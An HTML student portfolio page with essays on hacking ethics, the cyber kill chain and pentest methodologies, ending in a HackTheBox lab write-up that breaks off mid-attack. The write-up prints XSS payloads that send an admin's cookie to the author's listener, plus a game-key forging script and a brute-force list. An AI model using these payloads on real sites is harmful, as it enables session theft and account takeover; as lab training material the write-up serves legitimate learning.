          decrypt to get the password.</p>
          <a href="../../img/portfolio/red/ScapyPacket.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/ScapyPacket.png" alt=""></a>
          <p>I created a fake IPV4 packet using "scapy". I made it so that it looks like the packet is
          coming from google, but It's actually from me and I put my malicious code in it.</p>
          <a href="../../img/portfolio/red/WireSharkScapyPacket.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/WireSharkScapyPacket.png" alt=""></a>
          <p>I captured the packet with Wireshark and as you can see the source address is google, but
          when you look in the raw my malicious code is in there.</p>
          <ul class="list-inline">
          <li>Date: November 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Network sniffing and spoofing</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal16" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Law, Ethics and Responsible Disclosure</p>
          <p>The Ethics are both quite abstract though logical at the same time. The are written in an
          abstract manner in which they could apply to even other things than hacking. Thus making
          it logical as well. Many things you wouldn't do to someone in real life you wouldn't do
          online. I think it's the same point <a href="https://www.youtube.com/watch?v=HmZm8vNHBSU">these</a> guys tried to make,
          except badly executed.</p>
          <P>In my opinion the internet is one of the last few free places there are in the world.
          Though sometimes tightly controlled by governments, look at China or North-Korea, people
          still find ways around the system to express their voices. I agree with the ethics being
          like gentlemen rules, just don't be a dick to someone, don't do anything you wouldn't
          want to be done to yourself. But this doesn't include expressing your opinion even
          though it might hurt some people. On the internet you still got the right to say those
          things the same as people having the right to disagree and say something about it. While
          in the real world when you say something wrong people will call it a form of
          discrimination and you'll get prosecuted. Thus undermining the freedom of speech and
          creating more and more censorship.</P>
          <p>These are the responsible disclosures of companies I compared.</p>
          <ul>
          <li><a href="https://www.google.com/about/appsecurity/">Google</a></li>
          <li><a href="https://support.apple.com/en-us/HT201220">Apple</a></li>
          <li>
          <a href="https://fontys.nl/Over-Fontys/Organisatie-en-sturing/Onze-organisatieNieuw/Regelingen-statuten-en-reglementen/Responsible-disclosure-Fontys-Hogescholen.htm">Fontys</a>
          </li>
          </ul>
          <p>The first things that stood out to me was the rewards. While Google and Apple being big
          corporations reward the people with big sums of money, the Fontys rewards them by
          putting their name on the wall of fame. Looking at other smaller companies it is more
          common to give some merchandise, putting their names on the hall of fame or giving a
          small amount of money compared to the big numbers Google and Apple are giving as
          rewards.</p>
          <p>What they all have in common is that they want a full detailed report of what you did so
          they can reproduce the scenario. They all don't want you to make anything public before
          they had a chance to fix it and don't dig any deeper in sensitive date that is necessary
          to proof the vulnerability.</p>
          <p>They all also state that even though you did anything illegal while proofing the
          vulnerability, if you follow their responsible disclosure and follow their rules they
          won't pursue any legal actions.</p>
          <p>It is quite logical that companies don't prosecute these people and give them rewards
          instead, because if you think about it they will lose far less money when they pay these
          rewards then if they get hacked by a real threat. Looking at <a href="https://www.bugcrowd.com/bug-bounty-list/">this</a> website a lot of
          companies share that same ideology.</p>
          <ul class="list-inline">
          <li>Date: December 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Law, Ethics and Responsible Disclosure</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal17" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Basic hacking process</p>
          <p>First lets talk about the basic hacking process. This is a process most hackers will
          follow when conducting a hack, good or bad. Though good and bad use this process there
          is a key difference between the two.</p>
          <a href="../../img/portfolio/red/hackingstappen.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/hackingstappen.png" alt=""></a>
          <p>These are the basic hacking steps that are needed to conduct a good hack.</p>
          <h3>Intel Gathering</h3>
          <p>Intel gathering is the first step in the basic hacking process. In this step the hacker
          tries to gain as much information on his target as possible. He'll conduct for instance
          a OSINT, go to the physical location of his target and get a feel for the place and
          maybe even use social engineering to call his target and try to extract information.</p>
          <h3>Footprint</h3>
          <p>Now the hacker will conduct a network scan and try to gain as much information on the
          target's network as possible. He needs to find a foothold from which he can continue
          further, think about ip ranges, open ports, OS versions and important servers.</p>
          <h3>Vuln Analysis</h3>
          <p>The hacker will now look for any out of date software or operating systems to use
          exploits on. Whenever he'll find a software version he'll look if there's a CVE entry
          for that he could exploit. He might also use some automated tools to find common
          vulnerabilities for him. The hacker will also try any website for web vulnerabilities
          like SQL injection, command injection, CSRF and XSS.</p>
          <h3>Exploitation</h3>
          <p>Now is time for action. The hacker will use the information and vulnerabilities he found
          in the previous step to use his exploits. Thus gaining access to his target or the
          information he's after. Most ethical hackers/pentesters will stop after this step or not
          even do this step at all because it might result in destabilizing or shutting down the
          targets network.</p>
          <h3>Post Exploitation</h3>
          <p>This step and the following is more applicable to the bad actors out there. Here the
          hacker will extract the data he's after, edit some data, create new accounts and setup
          persistence for a backdoor so he can come back later without going through the same
          process again or have the risk of the target patching the vulnerability he used.</p>
          <h3>Clean Up</h3>
          <p>This step is very important for bad actors to not get caught. Here the hacker will try to
          remove all of his footsteps like logs. Therefore the police or target will not be able
          to track him down or even know what he did in the first place.</p>
          <a href="../../img/portfolio/red/Cyber-Kill-Chain.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/Cyber-Kill-Chain.png" alt=""></a>
          <p>Now this is the cyber kill chain even though it's comparable to the basic hacking process
          there are some differences.</p>
          <h3>Reconnaissance</h3>
          <p>Here the hacker will conduct recon comparable to the intel gathering stage in the basic
          hacking process.</p>
          <h3>Weaponization</h3>
          <p>In this step the hacker is already creating a payload with an exploit to attack his
          target. It is notable that in the cyber killchain they skip the footprint and vuln
          analysis stages.</p>
          <h3>Delivery</h3>
          <p>Now the payload is to be delivered to the target this can be done by phising email,
          rubber ducky and so on. This stage is also not present in the basic hacking process,
          there it's more part of the exploitation stage.</p>
          <h3>Exploitation</h3>
          <p>When the payload is delivered the hacker will activate his attack.</p>
          <h3>Installation</h3>
          <p>In this stage the hacker will install for example malware to create persistence for a
          backdoor or to act more stealthy. This would happen in the post exploitation stage in
          the basic hacking process.</p>
          <h3>Command & Control</h3>
          <p>Now the installed malware will call back to the command and control system and give the
          hacker control of the hacked system. This can be both part of the exploitation and post
          exploitation stage in the basic hacking process.</p>
          <h3>Actions on Objectives</h3>
          <p>Here the hacker will do whatever his intentions were.</p>
          <h4>The minimal requirements for a good pentest contract and pentest report</h4>
          <p>In a good pentest contract there should be a clearly defined scope and procedures in case
          of emergency. The contract should also include a confidentiality agreement. The pentest
          report should include the scope and goal of the project with the findings and how it was
          done. It should be explained very carefully and readable for people that weren't aware
          of the project. The most important thing is ofcourse the advice to give to the company,
          this way they'll be able to fix any security leaks and the pentest was a success.</p>
          <ul class="list-inline">
          <li>Date: January 2020</li>
          <li>Client: Fontys</li>
          <li>Category: Basic hacking process</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal18" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Self reflection</p>
          <p>The semester started quite slowly for me. It wasn't really clear for me were I should
          start and were I should look for the right information. This semester was quite
          different from the defending one. In the defending semester everything went quite easy
          and smooth and I had a clear goal that I wanted to achieve, I felt like I missed that
          this semester, hens why it didn't start so smoothly.</p>
          <p>I started this semester with absolutely no knowledge in hacking into things. I learned
          quite a lot this semester, must of the things I learned listening to podcasts and
          understanding the different concepts and trying different things on DVWA.</p>
          <p>I still don't really feel like I could actually conduct a good pentest and find some
          decent results after this semester which I think sucks, because I feel like I should. I
          do think I've the knowledge but I feel like I lack the How-to. I did think I would be
          quite good at defending a network and building one after previous semester, so I think
          it's a combination between a lack of goals and guidance.</p>
          <ul class="list-inline">
          <li>Date: January 2020</li>
          <li>Client: Fontys</li>
          <li>Category: Self reflection</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal19" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Cyber4Z</h2>
          <p class="item-intro text-muted">My internship at Cyber4Z</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: June 2021</li>
          <li>Client: Cyber4Z</li>
          <li>Category: Internship</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
           </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal20" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S7</h2>
          <p class="item-intro text-muted">Pen-testing methodologies</p>
          <p>The standard and most popular pentest methodology is the Lockheed Martin cyber killchain.
          It's a basic process that explains the order of action a criminal hacker would follow.
          Thus also making it a viable ethical hacker methodology.</p>
          <a href="img/portfolio/minor/red/pentest_methods/cyber-kill-chain-process.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/pentest_methods/cyber-kill-chain-process.png" alt=""></a>
          <p>Knowing what step a attacker is taking or needs to take is good to know. But it's also
          good to know how to mitigate or prevent each step of the cyber killchain.</p>
          <a href="img/portfolio/minor/red/pentest_methods/cyberkillprev.jpg"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/pentest_methods/cyberkillprev.jpg" alt=""></a>
          <p>Other than the Lockheed Martin cyber killchain there are a few other
          frameworks/methodologies, like the well-known OWASP.</p>
          <ol>
          <li>OSSTMM (Open Source Security Testing Methodology Manual)</li>
          <li>OWASP (Open Web Application Security Project)</li>
          <li>NIST (The National Institute of Standards and Technology)</li>
          <li>PTES (Penetration Testing Methodologies and Standards)</li>
          <li>ISSAF (Information System Security Assessment Framework)</li>
          </ol>
          <a href="https://www.vumetric.com/blog/top-penetration-testing-methodologies/">Source</a>
          <p><b>OSSTMM</b> is a peer-reviewed security assessment standard for testing and auditing
          systems and providing them with a risk score</p>
          <p><b>OWASP</b> is used as a methodology to pentest websites and web applications.</p>
          <p><b>NIST</b> is a very strict standard and they promote themselves as functionality
          driven. They mainly focus on helping federal agencies comply with regulations.</p>
          <p><b>PTES</b> is a structured approach to pentesting and looks a lot like the Lockheed
          Martin cyber killchain.</p>
          <p><b>ISSAF</b> is a pentesting methodology where the pentester imitates a hacker. This also
          looks a lot like the Lockheed Martin cyber killchain.</p>
          <p>Apart from all these methodologies there's another well known entity known by not only
          red teamers but also well-known by the blue teamers. This framework is known as the <a href="https://attack.mitre.org/">Mitre ATT&CK Framework</a> this framework
          contains almost every possible way to attack a network or machine.</p>
          <p>I've used the Mitre ATT&CK framework a lot when monitoring the SOC in my home network.
          Wazuh automatically categorizes the incoming alert in the Mitre ATT&CK framework. On the
          opposite side from te red teamer perspective I've used OWASP and the Lockheed Martin
          cyber killchain a lot. Mostly when performing pentests but also when cracking machines
          on Hackthebox and when participating in CTF events.</p>
          <ul class="list-inline">
          <li>Date: September 2021</li>
          <li>Client: Fontys</li>
          <li>Category: Minor Red-teaming</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal21" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S7</h2>
          <p class="item-intro text-muted">HackTheBox Linux Write-up</p>
          <a href="img/portfolio/minor/red/htb_linux/EarlyAccessCard.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/EarlyAccessCard.png" alt=""></a>
          <p>First lets start with the basic enumeration and do a NMap.</p>
          <code>sudo nmap -v -A -sS earlyaccess.htb</code>
          <a href="img/portfolio/minor/red/htb_linux/NMapOutput.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/NMapOutput.png" alt=""></a>
          <p>From the scan we can see that port 80 (http), 443 (https) and 22 (ssh) are open. Nothing
          special to see here really. Maybe we'll have more luck in finding something with
          GoBuster.</p>
          <code>gobuster dir -x 'php, xml, html, js, css, txt, md' -u earlyaccess.htb -w
          /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt</code>
          <a href="img/portfolio/minor/red/htb_linux/GoBusterOutput.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/GoBusterOutput.png" alt=""></a>
          <p>From the looks of it all the tries get redirected and these are all false positives.
          Let's try Ffuf as a last enumeration method in order to find hidden subdomains.</p>
          <code>ffuf -c -w /usr/share/wordlists/dirb/big.txt -u http://earlyaccess.htb -H "Host:
          FUZZ.earlyaccess.htb" -mc 200</code>
          <a href="img/portfolio/minor/red/htb_linux/FfufOutput.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/FfufOutput.png" alt=""></a>
          <p>Looks like we got a few interesting hits. So I'll add those to my /etc/Hosts file so we
          can take a look at them later on. So let's create a test account on the main page and
          let's see what we can find.</p>
          <a href="img/portfolio/minor/red/htb_linux/LoggedInAsTestUser.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/LoggedInAsTestUser.png" alt=""></a>
          <p>Interesting we can see a messaging service, a forum, a store and a place to register a
          key. We can also edit our own account. Let's take a look at the forum.</p>
          <a href="img/portfolio/minor/red/htb_linux/SingleQuoteForum.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/SingleQuoteForum.png" alt=""></a>
          <p>Some guy on the forum told the staff that his username caused an issue on the scoreboard,
          and because his username is SingleQuoteMan I feel like this is a nod towards either XSS
          or SQLI. We can probably steal a cookie from the admin if we use XSS in our username,
          because it will run when we message a staff member for support.</p>
          <a href="img/portfolio/minor/red/htb_linux/SendingMessage.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/SendingMessage.png" alt=""></a>
          <p>Now we'll just need to find a XSS script that will steal the cookie for us so we can use
          it. I tried a fair number of PHP cookie stealers but with out any luck.</p>
          <p> I tried to follow this guide <a href="https://null-byte.wonderhowto.com/how-to/write-xss-cookie-stealer-javascript-steal-passwords-0180833/">https://null-byte.wonderhowto.com/how-to/write-xss-cookie-stealer-javascript-steal-passwords-0180833/</a>
          and tried a number of different XSS scripts.
          </p>
          <code class="prettyprint">&#x3C;img src=x onerror=this.src='http://10.10.14.40:8888/'</code>
          <a href="img/portfolio/minor/red/htb_linux/PHPCookieStealer.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/PHPCookieStealer.png" alt=""></a>
          <code class="prettyprint">&#x3C;iframe src=http://10.10.14.40:8888/shell.php height=”0”
          width=”0”>&#x3C;/iframe></code>
          <p>But none of these worked. I did manage to steal my own cookie but when I tried stealing
          the admin's I get an "Unsupported ssl" error. So I probably have to make the cookie
          stealer server run on https. But before that I wanted to try to steal it one more time
          without using Java Springboot.</p>
          <a href="img/portfolio/minor/red/htb_linux/JavaCookieStealer.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/JavaCookieStealer.png" alt=""></a>
          <p>It was a longshot but worth the try because Springboot does a lot of stuff underwater and
          it just works most of the time. I used another XSS script as well because the other ones
          spammed my terminal full of bogus output.</p>
          <code class="prettyprint">&#x3C;script>document.location="http://10.10.14.88:8888/cookie?c="
          +
          document.cookie&#x3C;/script></code>
          <a href="img/portfolio/minor/red/htb_linux/AdminCookieJava.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/AdminCookieJava.png" alt=""></a>
          <p>And this worked! We got the admin cookie now all that's left is to change our cookie to
          the admin's and refresh the page!</p>
          <a href="img/portfolio/minor/red/htb_linux/LoggedInAsAdmin.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/LoggedInAsAdmin.png" alt=""></a>
          <p>We are logged in as admin but now what? From the looks of it we got a few new tabs in the
          navbar. Game and Dev are the subdomains we've already found but admin could be
          interesting.</p>
          <a href="img/portfolio/minor/red/htb_linux/ValidateAPI.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/ValidateAPI.png" alt=""></a>
          <p>It is an admin panel mostly used to validate game keys.</p>
          <a href="img/portfolio/minor/red/htb_linux/GameKeyForum.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/GameKeyForum.png" alt=""></a>
          <p>If we look back at the forum we can see that they are having trouble validating the game
          keys and that they resorted to an offline manual method. Let's download the offline key
          validator and see what we can find.</p>
          <pre style="text-align: left">                            <code class="prettyprint">
                                          #!/usr/bin/env python3
                                          import sys
                                          from re import match
          
                                          class Key:
                                          key = ""
                                          magic_value = "XP" # Static (same on API)
                                          magic_num = 346 # TODO: Sync with API (api generates magic_num every 30min)
          
                                          def __init__(self, key:str, magic_num:int=346):
                                          self.key = key
                                          if magic_num != 0:
                                          self.magic_num = magic_num
          
                                          @staticmethod
                                          def info() -> str:
                                          return f"""
                                          # Game-Key validator #
          
                                          Can be used to quickly verify a user's game key, when the API is down (again).
          
                                          Keys look like the following:
                                          AAAAA-BBBBB-CCCC1-DDDDD-1234
          
                                          Usage: {sys.argv[0]}
                                          &#x3C;game-key&#x3E;"""
          
                                              def valid_format(self) -> bool:
                                              return
                                              bool(match(r"^[A-Z0-9]{5}(-[A-Z0-9]{5})(-[A-Z]{4}[0-9])(-[A-Z0-9]{5})(-[0-9]{1,5})$",
                                              self.key))
          
                                              def calc_cs(self) -> int:
                                              gs = self.key.split('-')[:-1]
                                              return sum([sum(bytearray(g.encode())) for g in gs])
          
                                              def g1_valid(self) -> bool:
                                              g1 = self.key.split('-')[0]
                                              r = [(ord(v)<&#x3C;i+1)%256^ord(v) for i, v in enumerate(g1[0:3])]
                                              if r != [221, 81, 145]:
                                              return False
                                              for v in g1[3:]:
                                              try:
                                              int(v)
                                              except:
                                              return False
                                              return len(set(g1)) == len(g1)
          
                                              def g2_valid(self) -> bool:
                                              g2 = self.key.split('-')[1]
                                              p1 = g2[::2]
                                              p2 = g2[1::2]
                                              return sum(bytearray(p1.encode())) == sum(bytearray(p2.encode()))
          
                                              def g3_valid(self) -> bool:
                                              # TODO: Add mechanism to sync magic_num with API
                                              g3 = self.key.split('-')[2]
                                              if g3[0:2] == self.magic_value:
                                              return sum(bytearray(g3.encode())) == self.magic_num
                                              else:
                                              return False
          
                                              def g4_valid(self) -> bool:
                                              return [ord(i)^ord(g) for g, i in zip(self.key.split('-')[0],
                                              self.key.split('-')[3])] == [12, 4, 20, 117, 0]
          
                                              def cs_valid(self) -> bool:
                                              cs = int(self.key.split('-')[-1])
                                              return self.calc_cs() == cs
          
                                              def check(self) -> bool:
                                              if not self.valid_format():
                                              print('Key format invalid!')
                                              return False
                                              if not self.g1_valid():
                                              return False
                                              if not self.g2_valid():
                                              return False
                                              if not self.g3_valid():
                                              return False
                                              if not self.g4_valid():
                                              return False
                                              if not self.cs_valid():
                                              print('[Critical] Checksum verification failed!')
                                              return False
                                              return True
          
                                              if __name__ == "__main__":
                                              if len(sys.argv) != 2:
                                              print(Key.info())
                                              sys.exit(-1)
                                              input = sys.argv[1]
                                              validator = Key(input)
                                              if validator.check():
                                              print(f"Entered key is valid!")
                                              else:
                                              print(f"Entered key is invalid!")
                                      </code>
                                      </pre>
           <p>This is the original code it looks like they validate the key in parts so if we can
          reverse engineer these parts we can find out how to crack the key.</p>
          <a href="img/portfolio/minor/red/htb_linux/PythonCompiler.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/PythonCompiler.png" alt=""></a>
          <p>I put the Python code in an online compiler and removed all the functions and made it
          into a script. Then I put all the results in variables so we can see if a try is
          valid.</p>
          <pre style="text-align: left">                            <code class="prettyprint">
                                          from re import match
          
                                          class Key:
                                          key = "KEY01-0H0H0-XPAA0-GAME1-1295" #defaultkey=AAAAA-BBBBB-CCCC1-DDDDD-1234
                                          magic_value = "XP" # Static (same on API)
                                          magic_num = 346 # TODO: Sync with API (api generates magic_num every 30min)
                                          valid = False
                                          cs_value = 0
                                          cs_valid = False
                                          g1_valid = False
                                          g2_valid = False
                                          g3_valid = False
                                          g4_valid = False
          
                                          valid =
                                          bool(match(r"^[A-Z0-9]{5}(-[A-Z0-9]{5})(-[A-Z]{4}[0-9])(-[A-Z0-9]{5})(-[0-9]{1,5})$",
                                          key))
                                          print("valid_format: ", valid)
          
                                          gs = key.split('-')[:-1]
                                          cs_value = sum([sum(bytearray(g.encode())) for g in gs])
                                          print("cs_value: ", cs_value)
          
                                          ### g1 discovered by changing the first 3 characters untill the r value matched
                                          g1 = key.split('-')[0]
                                          r = [(ord(v)<&#x3C;i+1)%256^ord(v) for i, v in enumerate(g1[0:3])]
                                          print("r: ", r)
                                          if r != [221, 81, 145]:
                                          g1_valid = False
                                          for v in g1[3:]:
                                          try:
                                          int(v)
                                          except:
                                          g1_valid = False
                                          g1_valid = len(set(g1)) == len(g1)
                                          print("g1_valid: ", g1_valid)
          
                                          ### g2 discovered by putting p1 on 0 and shifting p2 until it matched
                                          g2 = key.split('-')[1]
                                          p1 = g2[::2]
                                          p2 = g2[1::2]
                                          g2_valid = sum(bytearray(p1.encode())) == sum(bytearray(p2.encode()))
                                          print("g2_valid: ", g2_valid)
          
                                          # TODO: Add mechanism to sync magic_num with API
                                          g3 = key.split('-')[2]
                                          if g3[0:2] == magic_value:
                                          g3_valid = sum(bytearray(g3.encode())) == magic_num
                                          else:
                                          g3_valid = False
                                          print("g3_valid: ", g3_valid)
          
                                          ### Same approach as g1 try different values untill they matched
                                          print("g4: ", [ord(i)^ord(g) for g, i in zip(key.split('-')[0], key.split('-')[3])])
                                          g4_valid = [ord(i)^ord(g) for g, i in zip(key.split('-')[0], key.split('-')[3])] == [12,
                                          4, 20, 117, 0]
                                          print("g4_valid: ", g4_valid)
          
                                          ### The CS value is just a byte sum of the whole key so this has to be the last value to
                                          crack and is pretty easy because we can just print the real CS value and match it
                                          cs = int(key.split('-')[-1])
                                          print("cs: ", cs)
                                          cs_valid = cs_value == cs
                                          print("cs_valid: ", cs_valid)
          
                                          def check(self) -> bool:
                                          if not self.valid_format():
                                          print('Key format invalid!')
                                          return False
                                          if not self.g1_valid():
                                          return False
                                          if not self.g2_valid():
                                          return False
                                          if not self.g3_valid():
                                          return False
                                          if not self.g4_valid():
                                          return False
                                          if not self.cs_valid():
                                          print('[Critical] Checksum verification failed!')
                                          return False
                                          return True
                                      </code>
                                      </pre>
          <a href="img/portfolio/minor/red/htb_linux/LocalKeyValidate.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/LocalKeyValidate.png" alt=""></a>
          <p>We cracked the code but the only thing that didn't work is part G3 because the magic
          number seems to be different on the server. When we try to validate it locally using the
          original validator script the key is valid. But maybe we can bruteforce this magic
          number using Burpsuite. There are only 60 possible combinations because the magic number
          is a sum of the last 3 characters, because the code said that the first two "XP" are
          static, And each character has a specific value. So I made a list.</p>
          <pre style="text-align: left">                            <code class="prettyprint">
                                          KEY01-0H0H0-XPAA0-GAME1-1295
                                          KEY01-0H0H0-XPAB0-GAME1-1296
                                          KEY01-0H0H0-XPAC0-GAME1-1297
                                          KEY01-0H0H0-XPAD0-GAME1-1298
                                          KEY01-0H0H0-XPAE0-GAME1-1299
                                          KEY01-0H0H0-XPAF0-GAME1-1300
                                          KEY01-0H0H0-XPAG0-GAME1-1301
                                          KEY01-0H0H0-XPAH0-GAME1-1302
                                          KEY01-0H0H0-XPAI0-GAME1-1303
                                          KEY01-0H0H0-XPAJ0-GAME1-1304
                                          KEY01-0H0H0-XPAK0-GAME1-1305
                                          KEY01-0H0H0-XPAL0-GAME1-1306
                                          KEY01-0H0H0-XPAM0-GAME1-1307
                                          KEY01-0H0H0-XPAN0-GAME1-1308
                                          KEY01-0H0H0-XPAO0-GAME1-1309
                                          KEY01-0H0H0-XPAP0-GAME1-1310
                                          KEY01-0H0H0-XPAQ0-GAME1-1311
                                          KEY01-0H0H0-XPAR0-GAME1-1312
                                          KEY01-0H0H0-XPAS0-GAME1-1313
                                          KEY01-0H0H0-XPAT0-GAME1-1314
                                          KEY01-0H0H0-XPAU0-GAME1-1315
                                          KEY01-0H0H0-XPAV0-GAME1-1316
                                          KEY01-0H0H0-XPAW0-GAME1-1317
                                          KEY01-0H0H0-XPAX0-GAME1-1318
                                          KEY01-0H0H0-XPAY0-GAME1-1319
                                          KEY01-0H0H0-XPAZ0-GAME1-1320
                                          KEY01-0H0H0-XPBZ0-GAME1-1321
                                          KEY01-0H0H0-XPCZ0-GAME1-1322
                                          KEY01-0H0H0-XPDZ0-GAME1-1323
                                          KEY01-0H0H0-XPEZ0-GAME1-1324
                                          KEY01-0H0H0-XPFZ0-GAME1-1325
                                          KEY01-0H0H0-XPGZ0-GAME1-1326
                                          KEY01-0H0H0-XPHZ0-GAME1-1327
                                          KEY01-0H0H0-XPIZ0-GAME1-1328
                                          KEY01-0H0H0-XPJZ0-GAME1-1329
                                          KEY01-0H0H0-XPKZ0-GAME1-1330
                                          KEY01-0H0H0-XPLZ0-GAME1-1331
                                          KEY01-0H0H0-XPMZ0-GAME1-1332
                                          KEY01-0H0H0-XPNZ0-GAME1-1333
                                          KEY01-0H0H0-XPOZ0-GAME1-1334
                                          KEY01-0H0H0-XPPZ0-GAME1-1335
                                          KEY01-0H0H0-XPQZ0-GAME1-1336
                                          KEY01-0H0H0-XPRZ0-GAME1-1337
                                          KEY01-0H0H0-XPSZ0-GAME1-1338
                                          KEY01-0H0H0-XPTZ0-GAME1-1339
                                          KEY01-0H0H0-XPUZ0-GAME1-1340
                                          KEY01-0H0H0-XPVZ0-GAME1-1341
                                          KEY01-0H0H0-XPWZ0-GAME1-1342
                                          KEY01-0H0H0-XPXZ0-GAME1-1343
                                          KEY01-0H0H0-XPYZ0-GAME1-1344
                                          KEY01-0H0H0-XPZZ0-GAME1-1345
                                          KEY01-0H0H0-XPZZ1-GAME1-1346
                                          KEY01-0H0H0-XPZZ2-GAME1-1347
                                          KEY01-0H0H0-XPZZ3-GAME1-1348
                                          KEY01-0H0H0-XPZZ4-GAME1-1349
                                          KEY01-0H0H0-XPZZ5-GAME1-1350
                                          KEY01-0H0H0-XPZZ6-GAME1-1351
                                          KEY01-0H0H0-XPZZ7-GAME1-1352
                                          KEY01-0H0H0-XPZZ8-GAME1-1353
                                          KEY01-0H0H0-XPZZ9-GAME1-1354
                                      </code>
                                      </pre>
          <p>First we need to intercept to post so we can copy it.</p>
          <a href="img/portfolio/minor/red/htb_linux/BurpsuiteIntercept.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/BurpsuiteIntercept.png" alt=""></a>
          <p>Now we can send it to the intruder to start brute-forcing this magic number.</p>
          <a href="img/portfolio/minor/red/htb_linux/BurpsuitePayload.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/BurpsuitePayload.png" alt=""></a>
          <p>I've added the payload which is the list of possible combinations we've just compiled.
          Now we need to add it into the POST.</p>
          <a href="img/portfolio/minor/red/htb_linux/BurpsuitePOST.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/BurpsuitePOST.png" alt=""></a>
          <p>Now let's start attacking!</p>
          <a href="img/portfolio/minor/red/htb_linux/BurpsuiteFailedAttack.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/BurpsuiteFailedAttack.png" alt=""></a>
          <p>That didn't go as planned it looks like all the requests got redirected let's look at the
          settings if we can change anything.</p>
